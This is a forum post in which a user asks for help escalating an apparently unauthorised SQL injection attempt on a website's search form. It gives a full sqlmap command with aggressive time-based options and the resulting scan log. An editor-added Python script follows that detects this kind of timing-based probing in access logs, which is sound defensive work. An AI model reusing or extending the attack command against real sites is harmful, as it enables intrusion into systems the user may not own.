I found an injection on a site, it's definitely there. I ran sqlmap (sqlmap -u
[target URL not shown: the forum hides link contents from visitors who are not logged in]
--data=action="action=do_search&keywords=1111111&postthread=1&author=1111111&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sortordr=desc&showresults=threads&submit=Search" --test-filter=SLEEP --random-agent --hex --ignore-redirects --ignore-timeouts --dbms=PostgreSQL --dbs --level 5 --risk 3 --string="Sorry, but you can only perform one search every 30 seconds. Please wait another 2 seconds before attempting to search again.")
As a result sqlmap finds the vulnerability, but I can't get any further with it.
[10:18:24] [INFO] POST parameter 'action' appears to be 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' injectable
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[10:18:25] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[10:18:27] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[10:18:32] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[10:18:33] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[10:18:33] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[10:18:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[10:18:33] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[10:18:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[10:18:33] [INFO] testing 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)'
[10:18:33] [INFO] checking if the injection point on POST parameter 'action' is a false positive
[10:18:33] [WARNING] false positive or unexploitable injection point detected
[10:18:33] [WARNING] POST parameter 'action' does not seem to be injectable
[10:18:33] [CRITICAL] all tested parameters appear to be not injectable. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
Can you suggest what else I should add?
P.S. There is no WAF on the site, I checked with wafw00f.
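From the site operator's side, a time-based blind probe like the one above (`--test-filter=SLEEP` against a POST search endpoint) leaves a timing signature in the access log even though POST bodies are not logged. The following is an added editor's example, not code from the post or from sqlmap: it parses constructed nginx-style log lines that include `$request_time` and flags clients whose requests to the search endpoint mix fast baseline responses with responses delayed by roughly a fixed sleep interval. The log format, endpoint path and IPs are assumptions.

```python
import re
from collections import defaultdict

# Constructed nginx-style access log (not taken from the post). Fields: client IP,
# timestamp, request line, status, $request_time in seconds, user agent.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:18:20 +0000] "POST /search.php HTTP/1.1" 200 0.120 "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:18:24 +0000] "POST /search.php HTTP/1.1" 200 0.131 "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:18:27 +0000] "POST /search.php HTTP/1.1" 200 5.114 "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:18:32 +0000] "POST /search.php HTTP/1.1" 200 5.102 "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:18:33 +0000] "POST /search.php HTTP/1.1" 200 0.118 "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:19:01 +0000] "POST /search.php HTTP/1.1" 200 0.140 "Mozilla/5.0"
"""

# The user agent is captured but deliberately not used as a key: the scan in the
# post was run with --random-agent, so it changes between requests.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<rt>\d+\.\d+) "(?P<ua>[^"]*)"$'
)


def parse(log_text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    rows = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["rt"] = float(d["rt"])
            rows.append(d)
    return rows


def find_time_based_probing(rows, endpoint, sleep_s=5.0, tolerance=0.5, min_hits=2):
    """Return {ip: (total_posts, delayed_posts)} for clients that sent at least
    `min_hits` POSTs to `endpoint` whose duration sits within `tolerance` of a
    multiple of `sleep_s`, while also having sub-second responses from the same
    endpoint (a slow-but-stable backend would not show that fast/slow split)."""
    per_ip = defaultdict(lambda: [0, 0, 0])  # total, delayed, fast
    for r in rows:
        if r["method"] != "POST" or r["path"] != endpoint:
            continue
        stats = per_ip[r["ip"]]
        stats[0] += 1
        k = round(r["rt"] / sleep_s)
        if k >= 1 and abs(r["rt"] - k * sleep_s) <= tolerance:
            stats[1] += 1
        elif r["rt"] < 1.0:
            stats[2] += 1
    return {ip: (t, d) for ip, (t, d, f) in per_ip.items() if d >= min_hits and f >= 1}
```

Run over the sample, only 10.0.0.5 is reported; the "one search every 30 seconds" flood control seen in the post's `--string` value is a separate rate limiter and does not by itself stop this probing pattern, so logging `$request_time` (or an equivalent) on form endpoints is what makes it visible.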